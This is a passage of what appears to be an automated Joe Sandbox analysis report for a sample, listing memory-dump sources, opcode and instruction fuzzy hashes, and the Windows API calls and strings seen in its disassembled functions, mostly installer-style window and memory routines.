        • Opcode Fuzzy Hash: a6c0517ade074d899f2e370b70dc703ebbd6106b1fe5c81ef61a0cd1b31ab7f9
        • Instruction Fuzzy Hash: 4CC138B2A183458FC754CF29D88065AFBE2BFC9308F19892DE998D7301D734E945CB96
        APIs
        • SetUnhandledExceptionFilter.KERNEL32(Function_00020BA0,001405F5), ref: 00140B92
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: b77838a2484e2705567e40f4f0426121f9854eda2efa1015d06d71fbbadf96f9
        • Instruction ID: fc472258516228b83e3390c595cbeaa556b0c8e16ae13dac404185d00bdbd334
        • Opcode Fuzzy Hash: b77838a2484e2705567e40f4f0426121f9854eda2efa1015d06d71fbbadf96f9
        • Instruction Fuzzy Hash:
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: HeapProcess
        • String ID:
        • API String ID: 54951025-0
        • Opcode ID: 1399caec1a3946286b6a97c30ac436d5456852217941c3d4828ca8e55c0e1b75
        • Instruction ID: 48a7e5e9acfda01638c0d5eef848ef3d2f01de87ebece0858d64613aae46ce64
        • Opcode Fuzzy Hash: 1399caec1a3946286b6a97c30ac436d5456852217941c3d4828ca8e55c0e1b75
        • Instruction Fuzzy Hash: 0EA02230202B02CF83008F32AF8830C3AFAFB032C23008028E008C8A30FF3082E08B02
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
        • Instruction ID: 24f5b7dee8bcb3f22d2247551d773b5dc4f2799fc15516c06fc60187fb4df37f
        • Opcode Fuzzy Hash: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
        • Instruction Fuzzy Hash: 2562F7B1608B859FCB39CF38C4906B9BBE1AF55304F19896DD8DA8B386D734A945C710
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
        • Instruction ID: 02f484cd4d1811eede9282e2290ea20456f05ff49e1a092db6b534d80da22d6b
        • Opcode Fuzzy Hash: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
        • Instruction Fuzzy Hash: A362F371A083859FCB18CF28C490AB9BBE1BF95304F09866DFC998B346DB30E955DB51
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
        • Instruction ID: 7c8860e44ecb486fa492fc597e4758fa99a07ee55d4787bd9c316b6e161377a8
        • Opcode Fuzzy Hash: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
        • Instruction Fuzzy Hash: 28525B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5859B255D334EA19CB86
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1c2a1b6a6e527f7a8a8192e5018eb68427af2f7f9073185f48d62b21a71263bf
        • Instruction ID: cc21907bdd0463d1b9390ebf471130a150deff5ab99f5f1927f83f5de6d18424
        • Opcode Fuzzy Hash: 1c2a1b6a6e527f7a8a8192e5018eb68427af2f7f9073185f48d62b21a71263bf
        • Instruction Fuzzy Hash: 6012C1B16047068FDB28CF28C4917B9B7E1FB54304F10892DF99AC7681EB78E9A5CB45
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ce7600aa4a4723fcc86c8713906360ea4e342cea873a86b863add749e0a3139c
        • Instruction ID: 2184a31362e57548e2860e6dfcd4543a1780089314b25f2cc1c7559ae27dbfde
        • Opcode Fuzzy Hash: ce7600aa4a4723fcc86c8713906360ea4e342cea873a86b863add749e0a3139c
        • Instruction Fuzzy Hash: 9FF1B9716083658FC718CF28E494A6ABBE5FF99314F144A2EF4C9DB291D730E916CB42
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3bffbab1e7addff0841b99475ee42b6a4d991f97271e0c900039c658e71d7d07
        • Instruction ID: f9a5d5330b22de5144cafbeda9d369bd5a444073f8d343bba0c90b5b089e122e
        • Opcode Fuzzy Hash: 3bffbab1e7addff0841b99475ee42b6a4d991f97271e0c900039c658e71d7d07
        • Instruction Fuzzy Hash: FFE15A755183908FC304CF5DD89086ABBF0BB9A304F4A0A5EF9C487352C734EA56DBA2
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
        • Instruction ID: fc9209a6cb5c96c6c16c304b937c3e6a37f3c39f737d6a20ae4affa961081c47
        • Opcode Fuzzy Hash: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
        • Instruction Fuzzy Hash: C39178B1204B459BDB28EF64D8D1BBE77D6EBA0700F10082DE99787282EB74E598D351
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
        • Instruction ID: 5ea0e3abfe90c57cd94273609b6074810123f7f8c6e39c88d7a0c439469068c9
        • Opcode Fuzzy Hash: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
        • Instruction Fuzzy Hash: 43816CB1304B459FEB28DF28C8D1BBE77D7DBA0B04F50092DE9868B282DB64D885D751
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 337268d9329f1f9dd37b13f9fa7ef2a6de8c59e48a6a2093acf0494e652d7441
        • Instruction ID: e8b57bf0d69d717e9a3e1795c05729564e685ca01cc62177ce7feb6780c7e429
        • Opcode Fuzzy Hash: 337268d9329f1f9dd37b13f9fa7ef2a6de8c59e48a6a2093acf0494e652d7441
        • Instruction Fuzzy Hash: 7A618BB1700704A6DE389B6898A1BBE3385EB1378CF11052AF982DF2B9D711DD858617
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
        • Instruction ID: 7ad57bf77b770a4b383d116addb7942f03eae2e1ff14e44ebe1158d5d20d6d3e
        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
        • Instruction Fuzzy Hash: AE516B71600785A7DF388E688955BFE3785AB2330CF1C092ED58AD72B2C755ED058357
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6dc882a3f8977e6f0d9f93a803da5769cd505c28e8a272dd9c06bd39ef9eca68
        • Instruction ID: d2f27d684607461bb4ab1241a5cc5eb9aaf01bf7fd3390649bfb2c7d01373950
        • Opcode Fuzzy Hash: 6dc882a3f8977e6f0d9f93a803da5769cd505c28e8a272dd9c06bd39ef9eca68
        • Instruction Fuzzy Hash: F851CF315093D58FC713CF2885905AFBFE0AEAE714F5A0999E4D95B242C331DB4ACB52
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b5f3fc202f7aea3e2d1564fa31267517fe51ac9267a217e1ae6603f17c61b0a4
        • Instruction ID: 04314c1c2dd09496a86ee1f9a64fbdc94fd7d4fe94c3322dac450c6c3fcde57d
        • Opcode Fuzzy Hash: b5f3fc202f7aea3e2d1564fa31267517fe51ac9267a217e1ae6603f17c61b0a4
        • Instruction Fuzzy Hash: AB51EFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E3740DB34E959CB96
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
        • Instruction ID: 29cf003593e40ac6984c79cf344d75786ad4af82725c8a63053f86b241d505af
        • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
        • Instruction Fuzzy Hash: 0031E3B1614B158FCB18DF28C89126ABBE1EB95700F10492DF496C7742C735E959CF91
        APIs
        • __EH_prolog.LIBCMT ref: 0013D877
          • Part of subcall function 0013C4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0013C5DB
        • _wcslen.LIBCMT ref: 0013DB3D
        • _wcslen.LIBCMT ref: 0013DB46
        • SetWindowTextW.USER32(?,?), ref: 0013DBA4
        • _wcslen.LIBCMT ref: 0013DBE6
        • _wcsrchr.LIBVCRUNTIME ref: 0013DD2E
        • GetDlgItem.USER32(?,00000066), ref: 0013DD69
        • SetWindowTextW.USER32(00000000,?), ref: 0013DD79
        • SendMessageW.USER32(00000000,00000143,00000000,0017389A), ref: 0013DD87
        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0013DDB2
        Similarity
        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
        • API String ID: 2804936435-312220925
        APIs
        • _swprintf.LIBCMT ref: 0012F62E
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
          • Part of subcall function 001330E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00163070,00000200,0012EC48,00000000,?,00000050,00163070), ref: 00133102
        • _strlen.LIBCMT ref: 0012F64F
        • SetDlgItemTextW.USER32(?,00160274,?), ref: 0012F6AF
        • GetWindowRect.USER32(?,?), ref: 0012F6E9
        • GetClientRect.USER32(?,?), ref: 0012F6F5
        • GetWindowLongW.USER32(?,000000F0), ref: 0012F795
        • GetWindowRect.USER32(?,?), ref: 0012F7C2
        • SetWindowTextW.USER32(?,?), ref: 0012F7FB
        • GetSystemMetrics.USER32(00000008), ref: 0012F803
        • GetWindow.USER32(?,00000005), ref: 0012F80E
        • GetWindowRect.USER32(00000000,?), ref: 0012F83B
        • GetWindow.USER32(00000000,00000002), ref: 0012F8AD
        Similarity
        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
        • String ID: $%s:$CAPTION$d
        • API String ID: 2407758923-2512411981
        APIs
        • ___free_lconv_mon.LIBCMT ref: 0014DD16
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D8CE
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D8E0
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D8F2
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D904
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D916
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D928
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D93A
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D94C
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D95E
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D970
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D982
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D994
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D9A6
        • _free.LIBCMT ref: 0014DD0B
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014DD2D
        • _free.LIBCMT ref: 0014DD42
        • _free.LIBCMT ref: 0014DD4D
        • _free.LIBCMT ref: 0014DD6F
        • _free.LIBCMT ref: 0014DD82
        • _free.LIBCMT ref: 0014DD90
        • _free.LIBCMT ref: 0014DD9B
        • _free.LIBCMT ref: 0014DDD3
        • _free.LIBCMT ref: 0014DDDA
        • _free.LIBCMT ref: 0014DDF7
        • _free.LIBCMT ref: 0014DE0F
        Similarity
        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
        • String ID:
        • API String ID: 161543041-0
        APIs
        • _wcslen.LIBCMT ref: 0013A6E6
        • _wcslen.LIBCMT ref: 0013A786
        • GlobalAlloc.KERNEL32(00000040,?), ref: 0013A795
        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0013A7B6
        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013A7DD
        Similarity
        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
        • API String ID: 1777411235-4209811716
        APIs
        • GetWindow.USER32(?,00000005), ref: 0013E801
        • GetClassNameW.USER32(00000000,?,00000800), ref: 0013E82D
          • Part of subcall function 00133306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0012D523,00000000,.exe,?,?,00000800,?,?,?,00139E4C), ref: 0013331C
        • GetWindowLongW.USER32(00000000,000000F0), ref: 0013E849
        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0013E860
        • GetObjectW.GDI32(00000000,00000018,?), ref: 0013E874
        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0013E89D
        • DeleteObject.GDI32(00000000), ref: 0013E8A4
        • GetWindow.USER32(00000000,00000002), ref: 0013E8AD
        Similarity
        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
        • String ID: STATIC
        • API String ID: 3820355801-1882779555
        APIs
        • _free.LIBCMT ref: 0014A425
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014A431
        • _free.LIBCMT ref: 0014A43C
        • _free.LIBCMT ref: 0014A447
        • _free.LIBCMT ref: 0014A452
        • _free.LIBCMT ref: 0014A45D
        • _free.LIBCMT ref: 0014A468
        • _free.LIBCMT ref: 0014A473
        • _free.LIBCMT ref: 0014A47E
        • _free.LIBCMT ref: 0014A48C
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
